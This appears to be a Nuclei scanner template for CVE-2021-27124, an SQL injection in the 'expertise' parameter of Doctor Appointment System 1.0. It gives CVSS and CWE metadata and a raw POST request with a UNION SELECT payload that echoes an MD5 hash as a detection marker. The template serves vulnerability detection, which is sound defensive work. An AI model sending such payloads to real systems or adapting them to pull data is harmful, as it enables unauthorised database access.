id: CVE-2021-27124 info: name: Doctor Appointment System 1.0 - SQL Injection author: theamanrawat severity: medium description: | SQL injection in the expertise parameter in search_result.php in Doctor Appointment System v1.0. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.sourcecodester.com/php/14182/doctor-appointment-system.html - https://packetstormsecurity.com/files/161342/Doctor-Appointment-System-1.0-SQL-Injection.html - https://nvd.nist.gov/vuln/detail/CVE-2021-27124 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2021-27124 cwe-id: CWE-89 epss-score: 0.02262 epss-percentile: 0.88405 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system tags: packetstorm,cve,cve2021,sqli,doctor-appointment-system,doctor_appointment_system_project http: - raw: - | POST /patient/search_result.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded expertise=Heart'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL--+-&submit= matchers-condition: and matchers: - type: word part: body words: - "c8c605999f3d8352d7bb792cf3fdb25b" - "Doctor Appoinment System" condition: and - type: word part: header words: - "text/html" - type: status status: - 200 # digest: 490a0046304402203bed756c6f4e399499479e9413596c917ef8f548853f048433b1b04559920e7302207fe08bfa3f4195ed77b5ce537271becd28bcf6409fce140e4206a821c56fa087:922c64590222798bb761d5b6d8e72950